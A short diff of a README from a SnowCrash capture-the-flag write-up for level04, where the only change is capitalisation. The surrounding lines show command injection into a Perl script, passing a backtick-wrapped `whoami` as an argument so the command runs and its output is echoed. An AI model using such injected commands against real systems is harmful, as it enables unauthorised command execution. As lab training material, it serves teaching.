dfinnis/SnowCrash/level04/Ressources/README.md

 level04@SnowCrash:~$ ./level04.pl x="whoami"
 whoami
 ```
-if we use backtick notation, we can pass a command and ensure it's run and its output captured and echoed.
+If we use backtick notation, we can pass a command and ensure it's run and its output captured and echoed.
 ```
 level04@SnowCrash:~$ ./level04.pl x=`whoami`
 level04